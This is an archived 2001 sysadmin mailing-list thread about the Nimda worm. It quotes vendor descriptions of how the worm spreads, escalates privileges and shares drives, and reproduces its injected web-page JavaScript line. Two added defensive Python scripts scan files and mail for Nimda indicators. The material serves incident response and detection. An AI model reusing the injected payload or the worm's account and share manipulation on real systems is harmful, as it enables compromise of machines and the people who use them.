RE: FW: Worm probes
From Panda (note they won't have a sig file for a few hours yet):

Panda Software alerts users on the appearance of W32/Nimda.A@mm (alias Nimda), possibly originated in China, which spreads through e-mail and is automatically executed simply by previewing the message that contains it. To perform the infection it exploits a vulnerability discovered by the security expert Juan Carlos García Cuartango in the Internet Explorer 5 browser, as well as the Outlook and Outlook Express mail clients. This flaw allows for the automatic and immediate execution of files. This means no action, such as double-clicking the attached file, is necessary for the virus to be activated. However, it requires that the 'preview' option is enabled in the mail clients for the vulnerability to be exploited and README.EXE, the virus filename, to be executed.

Due to this threat, Panda Software recommends following the news appearing in the specialised media. It also warns against opening the mail client before the anti-virus is updated with the corresponding pav.sig, which will be made available to all users by the European multinational in the next few hours, together with additional info about the virus.

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:21 PM
To: NT System Admin Issues
Subject: Fw: FW: Worm probes

Here's one from a thread on nanog.

HTH,
Geoff

----- Original Message -----
From: "Jim Olsen" [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Tuesday, September 18, 2001 11:03 AM
Subject: Re: FW: Worm probes

This is the information I've collected thus far on W32.nimda:

W32.nimda is NOT a Code Red variant, and the people who were referring to it as "Code Blue" were mistaken... The name it has been given (at least by TruSecure) is W32.nimda.a.mm. It uses several vulnerabilities in Windows NT and 2000 servers to infect a server, and also employs email and web site mobile code to infect Windows 9x/ME/NT/2k boxes.

During the initial infection of a server, the worm does the following:

- downloads a file named "admin.dll" via tftp from the system that is trying to infect the target
- adds the guest account to the local administrators group and activates the account
- makes sure c$ is shared out
- copies itself to c, d, and e drives
- tries to mail itself to email addresses that it discovers on the server
- creates a file named readme.exe, which is used in the mobile code inserted on the web sites below
- adds this string to the web pages found on the server:
  <html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>
- scans for and infects other vulnerable IIS servers
- goes through all shared directories and puts sample.nws, sample.eml, desktop.eml, desktop.nws in each directory. These are eml messages with copies of itself (readme.exe) autoloaded by the mobile html code mentioned above.
- goes through all shared directories and puts riched20.dll in each directory, which is a trojan dll version of W32.nimda that is meant to infect people running notepad/wordpad in that directory.
- puts a trojan mmc.exe in the winnt directory that is a copy of itself in the above "readme.exe" format (win2000 only)

If a user views a web site that is hosted on an infected server, the following happens:

- upon viewing an infected page, the mobile code extracts to readme.exe and starts in Windows Media Player (without user intervention)
- the user's machine becomes infected with W32.nimda at this point in time
- the worm starts scanning for other vulnerable IIS servers
- the worm emails itself to everyone in the user's address book
- goes through all shared directories and puts sample.nws, sample.eml, desktop.eml, desktop.nws in each directory. These are eml messages with copies of itself (readme.exe) autoloaded by the mobile html code mentioned above.
- goes through all shared directories and puts riched20.dll in each directory, which is a trojan dll version of W32.nimda that is meant to infect people running notepad/wordpad in that directory.
- puts a trojan mmc.exe in the winnt directory that is a copy of itself in the above "readme.exe" format (win2000 only)

It is unknown to me what happens (at this point in time) if a user opens an attachment that is sent from an infected site. It is possible that it could automatically infect the user's computer using the same methods mentioned above.

EVERYONE who uses Internet Explorer to browse the internet should probably do one of two things to stop from being automatically infected by W32.nimda (I have not tested whether or not turning off JavaScript fixes the problem):

o) don't browse web pages until Microsoft releases a patch
o) turn OFF JavaScript

EVERYONE who uses Outlook/Outlook Express should, at the very least, not open any attachments that they are not expecting. Turning off auto-preview
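The server-side and share-side artifacts Jim lists above (the dropped .eml/.nws files, riched20.dll, the appended window.open("readme.eml") script, the stray mmc.exe in the winnt directory) can be swept for from any host that can reach the web root or the shares. The following Python script is an added example written for this page, not code from the thread or from any vendor: the file names and the script marker are taken from the post, the directory layout it builds is constructed sample data, and the scan_tree/build_demo_tree names are the example's own.

```python
"""Scan a directory tree for the host artifacts the post above attributes
to W32.nimda.  Added example, not code from the thread; file names and the
injected script marker come from the post, the directory layout is
constructed sample data."""
import os
import re
import shutil
import tempfile

# File names the post says the worm drops into every shared directory.
# riched20.dll is a legitimate Windows component in the system directory;
# it is only suspicious when found under a share or web root.
DROPPED_NAMES = {
    "sample.nws", "sample.eml", "desktop.nws", "desktop.eml",
    "readme.eml", "readme.exe", "riched20.dll", "admin.dll",
}

# The script the post says is appended to served web pages (tags restored).
INJECTED_SCRIPT = re.compile(
    r'<script\s+language="JavaScript">\s*window\.open\("readme\.eml"',
    re.IGNORECASE,
)

WEB_EXTENSIONS = {".htm", ".html", ".asp"}


def scan_tree(root, winnt_dir=None):
    """Return a sorted list of (path, reason) findings under root.

    winnt_dir, if given, is checked for an mmc.exe in its top level, which
    is where the post places the trojan copy on Windows 2000."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            lower = name.lower()
            if lower in DROPPED_NAMES:
                findings.append((path, "dropped file name"))
            if os.path.splitext(lower)[1] in WEB_EXTENSIONS:
                try:
                    with open(path, "r", encoding="latin-1") as fh:
                        if INJECTED_SCRIPT.search(fh.read()):
                            findings.append((path, "injected readme.eml script"))
                except OSError:
                    pass  # unreadable page: skip rather than abort the sweep
    if winnt_dir:
        candidate = os.path.join(winnt_dir, "mmc.exe")
        if os.path.isfile(candidate):
            findings.append((candidate, "mmc.exe in winnt root"))
    return sorted(findings)


def build_demo_tree():
    """Create a constructed layout that mimics an infected web root, a share
    and a winnt directory; returns (root, winnt_dir).  Contents are filler."""
    root = tempfile.mkdtemp(prefix="nimda_demo_")
    web = os.path.join(root, "inetpub", "wwwroot")
    share = os.path.join(root, "share")
    winnt = os.path.join(root, "winnt")
    for d in (web, share, winnt):
        os.makedirs(d)
    with open(os.path.join(web, "default.htm"), "w") as fh:
        fh.write('<html><body>hello</body></html>\n'
                 '<html><script language="JavaScript">window.open("readme.eml", '
                 'null, "resizable=no,top=6000,left=6000")</script></html>\n')
    with open(os.path.join(web, "about.htm"), "w") as fh:
        fh.write("<html><body>clean page</body></html>\n")
    for name in ("sample.eml", "riched20.dll"):
        with open(os.path.join(share, name), "wb") as fh:
            fh.write(b"constructed sample, not the real file")
    with open(os.path.join(winnt, "mmc.exe"), "wb") as fh:
        fh.write(b"constructed sample")
    return root, winnt


if __name__ == "__main__":
    demo_root, demo_winnt = build_demo_tree()
    try:
        for path, reason in scan_tree(demo_root, demo_winnt):
            print(reason, "->", path)
    finally:
        shutil.rmtree(demo_root)
```

Run the script directly to build the sample tree and print the findings; point scan_tree at a real web root or share to use it for triage. The mmc.exe check deliberately looks only at the top level of the winnt directory, and riched20.dll is only reported where the scan runs, so the system directory itself should be left out of the scanned root.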
RE: FW: Worm probes
reg hack to not execute perhaps?

-----Original Message-----
From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:57 PM
To: NT System Admin Issues
Subject: RE: FW: Worm probes

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 3:26 PM
To: NT System Admin Issues
Subject: RE: FW: Worm probes

From Panda (note they won't have a sig file for a few hours yet):

Panda Software alerts users on the appearance of W32/Nimda.A@mm (alias Nimda), possibly originated in China, which spreads through e-mail and is automatically executed simply by previewing the message that contains it. To perform the infection it exploits a vulnerability discovered by the security expert Juan Carlos García Cuartango in the Internet Explorer 5 browser, as well as the Outlook and Outlook Express mail clients. This flaw allows for the automatic and immediate execution of files. This means no action, such as double-clicking the attached file, is necessary for the virus to be activated. However, it requires that the 'preview' option is enabled in the mail clients for the vulnerability to be exploited and README.EXE, the virus filename, to be executed.

I am not so sure that this assessment is entirely correct. For example, in my situation, I have a PC with Outlook 2000 and preview mode enabled. What I get is that when I click on the email a dialog box opens and prompts whether or not I wish to save the file to disk - the README.EXE file, that is. I just click cancel and then delete the email. I do not contract the virus.

John
RE: FW: Worm probes
Name: Nimda
Alias: W32/Nimda
Virus Categories: WORM (E-MAIL)
Virus Families: W32 GROUP
Repairable: Yes
Date of Appearance: 09/18/2001
Included in the "Wild List": No

Activation Condition

Basic Information:
W32/Nimda is a worm that spreads by e-mail and exploits a vulnerability in Windows 98 and Windows 2000 that makes it possible to run Audio/X-wav files through Windows Explorer. To ensure its propagation, this worm sends out a message that includes an attachment with the following name: README.EXE. This file pretends to be an Audio/X-wav file coded in Base64 format. After being decoded, the executable file that contains the worm is 57344 bytes long. One of the actions carried out by this worm consists of sharing the drive C: of the affected computer in order to spread to other network drives.

Means of Propagation
This worm uses e-mail to spread to other systems. To do this it sends out messages containing an attachment with the following name: README.EXE.

Symptoms of Infection
This worm creates several files in the Windows temporary directory. Although the content of these files is basically very similar to the original file, it does present certain variations. Additionally, it creates a file called Wininit.ini in the Windows directory. The worm is coded to download a file called Admin.dll. To do this it uses an application called Tftp.exe. Finally, the worm creates a new user through which it shares the C drive and attempts to spread to other network drives. Additionally, it exploits a vulnerability in Windows 98 and Windows 2000 that makes it possible to run Audio/X-wav files through Windows Explorer.

-----Original Message-----
From: Ray Zorz
Sent: Tuesday, September 18, 2001 12:58 PM
To: NT System Admin Issues
Subject: RE: FW: Worm probes

reg hack to not execute perhaps?
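The Panda entry above describes the mail vector precisely enough to check for at a gateway: a base64 part declared as Audio/X-wav, carrying the filename README.EXE, that decodes to a 57344-byte Windows executable. The following Python script is an added example written for this page, not code from the thread or from Panda. It builds a constructed message with inert zero filler in place of the worm, then flags any attachment whose declared type, filename and decoded content disagree. The check_attachments and build_sample_message names are the example's own, and the "MZ" test is the standard DOS/PE executable header.

```python
"""Flag mail attachments whose declared MIME type, file name and decoded
content disagree, using the indicators the Panda entry gives for Nimda's
README.EXE.  Added example for this page; the message is constructed and the
attachment body is zero filler, not the worm."""
import email
from email import policy
from email.message import EmailMessage

# Size of the decoded README.EXE according to the Panda entry.
NIMDA_README_SIZE = 57344


def build_sample_message():
    """Return a constructed RFC 822 message (as a string) with one harmless
    attachment and one that mimics the Nimda carrier: declared audio/x-wav,
    named README.EXE, base64-encoded, decoding to an MZ-headed blob."""
    msg = EmailMessage()
    msg["From"] = "sender@example.invalid"
    msg["To"] = "victim@example.invalid"
    msg["Subject"] = "constructed sample message"
    msg.set_content("body text")
    # A genuine-looking WAV: RIFF header, declared and named as audio.
    msg.add_attachment(b"RIFF" + b"\x00" * 60, maintype="audio",
                       subtype="x-wav", filename="sound.wav")
    # The suspicious part: PE magic behind an audio content type.
    fake_pe = b"MZ" + b"\x00" * (NIMDA_README_SIZE - 2)
    msg.add_attachment(fake_pe, maintype="audio", subtype="x-wav",
                       filename="README.EXE")
    return msg.as_string()


def check_attachments(raw_message):
    """Parse raw_message and return one dict per part that trips at least one
    check, carrying filename, declared content type, decoded size and the
    list of reasons."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        filename = part.get_filename() or ""
        ctype = part.get_content_type()
        payload = part.get_payload(decode=True) or b""
        reasons = []
        # Executable extension regardless of what the type header claims.
        if filename.lower().endswith(".exe"):
            reasons.append("executable file name")
        # DOS/PE magic under a non-application content type: the type lies.
        if payload.startswith(b"MZ") and not ctype.startswith("application/"):
            reasons.append("PE content declared as " + ctype)
        # Exact size the Panda entry gives for the decoded worm body.
        if len(payload) == NIMDA_README_SIZE:
            reasons.append("decoded size matches 57344-byte README.EXE")
        if reasons:
            findings.append({"filename": filename, "content_type": ctype,
                             "size": len(payload), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for hit in check_attachments(build_sample_message()):
        print(hit["filename"], hit["content_type"], hit["size"],
              "; ".join(hit["reasons"]))
```

The size match is the weakest of the three signals, since any other build of the file would change it; the type/content mismatch is the durable one and is the check a mail filter keeps after the signature has aged. John's observation that his Outlook 2000 prompts rather than executes does not change what a gateway should do with such a part.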
RE: FW: Worm probes
-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 3:26 PM
To: NT System Admin Issues
Subject: RE: FW: Worm probes

From Panda (note they won't have a sig file for a few hours yet):

Panda Software alerts users on the appearance of W32/Nimda.A@mm (alias Nimda), possibly originated in China, which spreads through e-mail and is automatically executed simply by previewing the message that contains it. To perform the infection it exploits a vulnerability discovered by the security expert Juan Carlos García Cuartango in the Internet Explorer 5 browser, as well as the Outlook and Outlook Express mail clients. This flaw allows for the automatic and immediate execution of files. This means no action, such as double-clicking the attached file, is necessary for the virus to be activated. However, it requires that the 'preview' option is enabled in the mail clients for the vulnerability to be exploited and README.EXE, the virus filename, to be executed.

I am not so sure that this assessment is entirely correct. For example, in my situation, I have a PC with Outlook 2000 and preview mode enabled. What I get is that when I click on the email a dialog box opens and prompts whether or not I wish to save the file to disk - the README.EXE file, that is. I just click cancel and then delete the email. I do not contract the virus.

John